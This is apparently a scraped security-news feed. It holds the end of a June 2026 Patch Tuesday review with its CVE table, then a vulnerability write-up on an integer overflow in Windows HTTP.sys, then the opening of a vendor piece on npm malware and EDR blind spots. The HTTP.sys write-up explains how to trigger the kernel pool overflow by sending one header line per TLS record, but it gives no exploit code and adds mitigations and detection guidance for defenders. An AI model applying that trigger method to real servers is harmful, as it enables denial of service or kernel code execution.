  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42981"><span>CVE-2026-42981</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42974"><span>CVE-2026-42974</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45487"><span>CVE-2026-45487</span></a></td>
  <td width="256" class="xl68">Windows Program
  Compatibility Assistant Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42828"><span>CVE-2026-42828</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42837"><span>CVE-2026-42837</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42969"><span>CVE-2026-42969</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42971"><span>CVE-2026-42971</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42970"><span>CVE-2026-42970</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42973"><span>CVE-2026-42973</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42978"><span>CVE-2026-42978</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42977"><span>CVE-2026-42977</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42979"><span>CVE-2026-42979</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42991"><span>CVE-2026-42991</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45639"><span>CVE-2026-45639</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42908"><span>CVE-2026-42908</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45593"><span>CVE-2026-45593</span></a></td>
  <td width="256" class="xl68">Windows SDK Elevation
  of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42906"><span>CVE-2026-42906</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42907"><span>CVE-2026-42907</span></a></td>
  <td width="256" class="xl68">Windows Shell
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47648"><span>CVE-2026-47648</span></a></td>
  <td width="256" class="xl68">Windows Storage
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42915"><span>CVE-2026-42915</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP Denial
  of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42904"><span>CVE-2026-42904</span></a></td>
  <td width="256" class="xl68">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42968"><span>CVE-2026-42968</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42912"><span>CVE-2026-42912</span></a></td>
  <td width="256" class="xl68">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45597"><span>CVE-2026-45597</span></a></td>
  <td width="256" class="xl68">Windows UI Automation
  Manager (uiamanager.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45599"><span>CVE-2026-45599</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45635"><span>CVE-2026-45635</span></a></td>
  <td width="256" class="xl68">Windows UPnP Device
  Host Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40409"><span>CVE-2026-40409</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40404"><span>CVE-2026-40404</span></a></td>
  <td width="256" class="xl68">Windows Universal Disk
  Format File System Driver (UDFS) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42989"><span>CVE-2026-42989</span></a></td>
  <td width="256" class="xl68">Winlogon
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this release, the scariest-looking one is actually nothing to concern yourself with at all. The CVSS 10 bug in Azure HorizonDB has already been addressed by Microsoft and is just being documented now. That’s also the case for five others. Of course, there wouldn’t be a release without Office bugs that have the Preview Pane as an attack vector. There are multiple in June. There’s a handful of bugs in the Remote Desktop Client, but these rely on connecting to a malicious RDP server. There are three patches for Hyper-V that allow for guest-to-host code execution. The bug in Active Directory requires authentication, but any authenticated user can hit it. For the Windows Directory Service vulnerability, it needs to be listening for TFTP. You have blocked that everywhere, right? The bug in Azure Network Adapter is somewhat unique as you need to update your Linux kernel to be protected. The bug in Azure Kubernetes allows an attacker to break out of a container and gain control of the AKS worker node. Finally, the bug in the Kerberos Key Distribution Center (KDC) seems unlikely, but if exploited, it could allow authenticated attackers to get code execution on affected systems.</p><p class="">Moving on to the other code execution bugs, there are the ubiquitous open-an-own bugs in Office components like Excel and Word. The code injection bug in Exchange Server looks troubling, but it requires a machine-in-the-middle (MiTM), so exploitation is unlikely. The bugs in SharePoint require authentication, but you should note that the patch applies to both SharePoint Server 2016 and SharePoint Enterprise Server 2016. The two bugs in UPnP are interesting. Both can lead to code execution by causing an error during the handling of specially crafted data, which could lead to a Use After Free (UAF) bug. The bugs in RDP Client all require connecting to a malicious RDP server, but it’s not clear why some are rated Critical and some are rated Important. The NTFS vulnerability requires a user to mount a virtual hard drive on an affected system. The last RCE bug this month is in Azure Stack Edge and requires the attacker to send a specially crafted file upload request that includes a manipulated file name or path, leading to code execution.</p><p class="">There are more than 60 Elevation of Privilege (EoP) bugs in this month’s release, and as usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. A notable exception is in Exchange Server, where a user on Outlook Web Access (OWA) could gain access to other mailboxes. The bug in Visual Studio Code could allow attackers to gain permissions associated with the MCP Server’s managed identity. The bugs in Windows SDK and Windows UI Automation Manager could let attacker go from low integrity up to medium integrity code execution. The bug in Bluetooth just allows “elevated” privileges without really describing what elevated might be. </p><p class="">Moving on to the more than 20 security feature bypass (SFB) bugs in the June release, there are a total of 10 that impact Secure Boot. All carry scope change (S:C) in the CVSS, meaning successful exploitation affects security boundaries beyond the vulnerable component itself — specifically the ability to load untrusted code at boot, bypass Virtual Secure Mode, and undermine boot integrity guarantees. CVE-2026-45654 explicitly calls out VSM exposure. The bulk of these are credited to Alon Leviev (STORM), which is notable given his prior BootKitty/BlackLotus-adjacent research. The bugs in the Windows Boot Manager have a similar impact as the Secure Boot bugs. The UEFI Secure Boot vulnerabilities go a layer deeper. They require either local admin or physical access but could allow for the running of untrusted code even before the OS loads. Rootkits anyone? The four bugs in BitLocker all require physical access but could yield encrypted data if exploited. The bug in Windows Administration Protection allows attackers to bypass the feature that prevents standard-user apps from performing admin-level actions. The bug in Visual Studio Copilot Chat could be the most interesting non-boot bug here as it allows authentication impersonation. Mark of the Web (MotW) and Excel vulns could bypass user warnings. Lastly, the bug in PC Manager bypasses expected user controls. </p><p class="">Turning our attention to the mass of spoofing bugs in the release, we instantly see 18 impacting SharePoint Server. Fortunately, these are simply cross-site scripting (XSS) bugs. It’s the Exchange bugs we should really watch for. One is an XSS that an attacker can exploit by convincing an Exchange administrator to open a malicious link or message, which then runs code in the admin's web session. That's a meaningful privilege escalation path. Another is listed as an SSRF-based attack, but no other details are available. The last is a lower-impact XSS with limited confidentiality/integrity loss. The bug in Bing Search (remember Bing?) is a classic search result spoofing. The bug in Azure Stack Edge is interesting as it could allow access to resources outside the vulnerable component's security boundary. The bug in Office for Android requires user interaction. The Office Project Server bug is an authenticated XSS with low impact. The final spoofing bug is in Azure Attestation but has already been addressed. You should still verify you are protected by following the instructions in the write-up from Microsoft.</p><p class="">There are 30 different information disclosure bugs in this release, and fortunately, the vast majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. The two bugs in Visual Studio require user interaction and could “disclose information over a network.” How obtuse. The bug in GitHub Copilot and Visual Studio Code could disclose discloses a sign-in access token for a user's work account. That's a meaningful credential exposure, not just random memory. That leaves the two bugs in Exchange Server. One could allow an authenticated user to gain information about which network services that the Exchange server can reach. The other sounds much like the spoofing bug in OWA as it allows attackers to see information in mailboxes they should not have access to.</p><p class="">I’ve never been a fan of the “tampering” category, as it could mean so many different things. For example, the bug in .NET simply says it could allow an unauthorized attacker to perform tampering locally. Similarly, the bug in Visual Studio says the same, expect here the tampering occurs over a network. Microsoft doesn’t even bother with a CWE for the tampering bug in the DHCP Server, so your guess is as good as mine.</p><p class="">There are seven DoS bugs in the June release, and as usual, Microsoft provides little to no actionable information about the vulnerabilities. The most interesting is the bug in HTTP.sys, which is listed as publicly known. This is an uncontrolled resource consumption, rated "Exploitation More Likely," and publicly disclosed. Since, HTTP.sys sits at the core of IIS and Windows web services, a network-accessible DoS here can take down any Windows server running HTTP-based services. Based on the Acknowledgement, it looks like this bug may have been found using AI. There are no real details for the other bugs, but based simply on the impact, I would focus on the Kerberos and TCP/IP bugs if you had to prioritize.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">The next Patch Tuesday will be on July 14 and will be the last one before Black Hat/DEFCON. It’s usually a big release, so strap in and hang on. I’ll be back then to give you my full thoughts. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p><p class=""> </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-47291: Remote Code Execution in the Windows HTTP.sys]]></title>
<description><![CDATA[In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service co...]]></description>
<link>https://tsecurity.de/de/3694561/hacking/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694561/hacking/cve-2026-47291-remote-code-execution-in-the-windows-httpsys/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class=""><em>In this excerpt of a TrendAI Research Services vulnerability report, Yazhi Wang and Jonathan Lein of the TrendAI Research team detail a recently patched remote code execution bug in the Windows HTTP protocol stack. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges. The following is a portion of their write-up covering CVE-2026-47291, with a few minimal modifications.</em></p>





















  
  




  



  <hr>
  
    
    



  




  <p class="">A remote code execution vulnerability exists in the HTTP Protocol Stack for Microsoft Internet Information Services implemented in HTTP.sys. The vulnerability is due to invalid validating incoming HTTP requests. </p><p class="">A remote, unauthenticated attacker can exploit this vulnerability by sending crafted HTTP packets to the target system. Successful exploitation of this vulnerability can result in a denial-of-service condition, or, in the worst case, code execution with kernel privileges.</p><p class=""><strong>The Vulnerability</strong></p><p class=""><em>HTTP.sys</em> is the kernel-mode HTTP protocol driver in Microsoft Windows. It provides HTTP request parsing, response caching, and SSL/TLS termination for Internet Information Services (IIS) and other applications that register URL prefixes. The driver listens on configured TCP ports (commonly 80 for HTTP and 443 for HTTPS) and processes inbound HTTP/1.x and HTTP/2 requests at the kernel level.</p><p class="">When operating over HTTPS, <em>HTTP.sys</em> delegates TLS processing to the Windows Secure Channel (SChannel) provider. Inbound TCP data is decrypted on a <a href="https://www.rfc-editor.org/info/rfc8446/">per-record basis</a>: each TLS record constitutes an independent unit of encryption and is decrypted separately by SChannel before being delivered to <em>HTTP.sys</em> as a distinct plaintext buffer. A single TLS 1.3 application data record has the following structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class="">The decrypted payload of each TLS record is delivered independently to the HTTP parser via</p><p class=""><em>UlHttpBufferReceiveEvent()</em>, regardless of how many TLS records the underlying TCP connection coalesces into a single TCP segment. This behavior is distinct from plaintext HTTP connections, where the Windows TCP stack coalesces multiple segments into a single receive indication before the data reaches <em>HTTP.sys</em>.</p><p class="">The HTTP parser maintains a per-request state object that includes a dynamically grown buffer reference array. The <em>capacity</em> field stores the current number of allocated slots in the buffer reference array. The <em>count</em> field stores the number of slots currently in use. The <em>ref_array_ptr</em> field points to the dynamically allocated array of 8-byte buffer reference entries.</p><p class="">An integer overflow vulnerability exists in <em>HTTP.sys</em>. The vulnerability is due to insufficient bounds checking when growing a buffer reference array during HTTP/1.x header parsing. When <em>HTTP.sys</em> receives data for an HTTP/1.x request, it allocates a <em>UL_REQUEST_BUFFER</em> structure for each receive indication and tracks these buffers in the per-request reference array described above. The <em>count</em> field records the number of active buffer references, and the <em>capacity</em> field records the total number of allocated slots. </p><p class="">As the HTTP parser (<em>UlpParseNextRequest()</em>) processes header lines, it calls an inline buffer reference routine each time a new receive buffer is consumed. When <em>count</em> reaches <em>capacity</em>, the routine grows the array by reallocating it with five additional slots. The new allocation size is computed as 0x28 + <em>capacity</em> * 8, the contents of the existing array are copied via <em>memmove</em> using <em>count</em> * 8 as the copy length, and <em>capacity</em> is incremented by 5 as a 16-bit unsigned integer addition. No overflow check is performed on this addition.</p><p class="">After 13,107 growth events, <em>capacity</em> reaches 0xFFFB. The next growth adds 5, producing 0x10000, which truncates to 0x0000 in the 16-bit field. On the subsequent buffer reference addition, <em>count</em> (which is now 65,536 or greater) exceeds the zero <em>capacity</em>, triggering another growth. The allocation size computation 0x28 + 0 * 8 produces a 40-byte allocation, but the <em>memmove</em> copies <em>count</em> * 8 bytes (approximately 524,256 bytes) from the old buffer into the 40-byte allocation. This results in a kernel pool heap buffer overflow of over 500 kilobytes.</p><p class="">Each buffer reference corresponds to one receive buffer delivered to the HTTP parser. For plaintext HTTP connections, the Windows TCP stack coalesces received segments into large indications, and <em>UlpMergeBuffers() </em>further combines buffers within <em>HTTP.sys</em>. Over TLS connections, each TLS record is decrypted independently by SChannel and delivered as a separate buffer through <em>UlHttpBufferReceiveEvent()</em> into <em>UlpCopyIndicatedData()</em>. If each TLS record contains exactly one complete header line (terminated by CRLF), the HTTP parser fully consumes the buffer without setting the partial-parse flag, causing <em>UlpAdjustBuffers()</em> to advance to the next buffer via its non-merge path. This creates a 1:1 correspondence between TLS records sent and buffer references accumulated.</p><p class="">To trigger the overflow, an attacker crafts an HTTP request in which each header line is encapsulated in a separate TLS application data record. Given a minimum header line size of approximately 4 bytes and a required count of 65,536 buffer references, the total request size comes to roughly 262,144 bytes. The <em>MaxRequestBytes </em>registry value (at <em>HKLM\SYSTEM\CurrentControlSet\Services\HTTP\Parameters</em>) must be configured to a value of at least 262,144 bytes for the server to accept a request of this size. The default value of 16,384 bytes limits the request to approximately 4000 header lines, which is insufficient to trigger the overflow. As a mitigation, keeping <em>MaxRequestBytes</em> at or below 65,535 bytes represents the most conservative configuration to prevent this attack.</p><p class="">A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted HTTP/1.x request over a TLS connection to an affected server. Successful exploitation results in unexpected system termination due to a memory access exception in the context of the kernel. Under specific memory layout conditions, exploitation could result in arbitrary code execution in the context of the kernel.</p><p class=""><strong>Notes:</strong></p><p class="">• The vulnerability is only reachable through HTTP/1.x header parsing over TLS connections. HTTP/2 and HTTP/3 use different parser paths that do not interact with the buffer reference array.</p><p class="">• Body data parsing (Content-Length or chunked transfer encoding) does not add entries to the buffer reference array. Only header parsing triggers buffer reference growth.</p><p class="">• At a sending rate of 10 milliseconds per TLS record, the overflow requires approximately 11 minutes to trigger.</p><p class=""><strong>Source Code Walkthrough</strong></p><p class="">The following code snippet was taken from <em>HTTP.sys</em> version 10.0.26100.7705. Comments added by TrendAI Research have been highlighted.</p><p class="">In <em>UlpParseNextRequest()</em>:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class=""><strong>Detection Guidance</strong></p><p class="">To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the TCP port 443.</p><p class="">The traffic on the affected port(s) is TLS-encrypted. The detection device must be able to decrypt the TLS traffic before applying the following detection method. The detection device should monitor for HTTPS connections.</p><p class="">An HTTP/1.x request [1] consists of a request line followed by zero or more header field lines, each terminated by CRLF. The following grammar defines the relevant structure:</p>





















  
  




  


  
  
    
    
      
        
        
        
        
          
        
        
        
      
    
  
  
    



  



  




  <p class=""><em>Decrypted traffic inspection:</em></p><p class="">After decrypting the TLS session, the detection device must parse the HTTP/1.x request headers. The detection device must count the number of distinct header field lines present in a single HTTP request. If the number of header field lines in a single request exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Encrypted traffic heuristics:</em></p><p class="">Where decryption is not available, the detection device should inspect the pattern of TLS application data records within the encrypted session. If each TLS application data record contains a single short payload and the total number of such records on a single connection exceeds 1,000, the traffic should be considered suspicious; an attack exploiting this vulnerability is likely underway.</p><p class=""><em>Notes:</em></p><p class="">• The preferred detection method (header line count) requires the ability to decrypt TLS traffic, for example through TLS inspection, a decrypting proxy, or possession of the server's private key. This method directly observes the attack indicator and produces low false-positive and false-negative rates.</p><p class="">• The TLS record heuristic operates on encrypted traffic and does not require decryption. This method is more prone to false positives (legitimate applications that send many small TLS records, such as interactive streaming sessions, may trigger the heuristic) and to false negatives (the threshold is based on observable record sizes rather than the actual header count that determines exploitability). Where possible, decrypted traffic inspection should be preferred.</p><p class="">• The attack requires approximately 11 minutes of sustained connection to accumulate sufficient header lines. Connection duration monitoring may serve as a supplementary detection heuristic.</p><p class=""><strong>Conclusion</strong></p><p class="">This vulnerability was <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47291">patched</a> by Microsoft in the June 2026 release cycle. They note several mitigations that include editing the registry to ensure unpatched systems are not vulnerable to exploitation. However, the best method to ensure this bug has been fully remediated is to test and deploy the vendor-supplied patch.</p><p class="">Special thanks to Yazhi Wang and Jonathan Lein of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services, please visit <a href="https://go.trendmicro.com/tis/vulnerabilities.html">https://go.trendmicro.com/tis/vulnerabilities.html</a>.</p><p class="">The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a> for the latest in exploit techniques and security patches.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[5 endpoint blind spots your EDR/XDR was never built to see]]></title>
<description><![CDATA[In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.



That was enough. Over 86,000 downloads. Malicious code in PhantomRaven, packages running in the production systems of Fort...]]></description>
<link>https://tsecurity.de/de/3694387/it-security-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694387/it-security-nachrichten/5-endpoint-blind-spots-your-edrxdr-was-never-built-to-see/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In August 2025, 126 malicious packages landed in the npm registry. Even after the community caught the initial wave, 80 of these hidden backdoors remained actively listed.</p>



<p class="wp-block-paragraph">That was enough. Over 86,000 downloads. Malicious code in <a href="https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies" target="_blank" rel="noreferrer noopener">PhantomRaven</a>, packages running in the production systems of Fortune 500 companies worldwide. And throughout the entire window, not a single EDR/XDR alert.</p>



<p class="wp-block-paragraph">This happened because the attack surface has expanded to a layer EDR/XDR was never designed to see: VS Code extensions, local MCP servers, and rogue AI coding assistants that inherit your engineers’ valid credentials to steal data at machine speed.</p>



<p class="wp-block-paragraph">To eliminate this structural vulnerability, Palo Alto Networks acquired Koi, an AI-native developer security product engineered for proactive, precision enforcement. Below we compiled a 2026 CISO checklist you can use to audit your environment and see how Koi automates each defense from day one.</p>



<p class="wp-block-paragraph"><strong>#1. Gain real-time visibility into shadow AI &amp; extensions</strong></p>



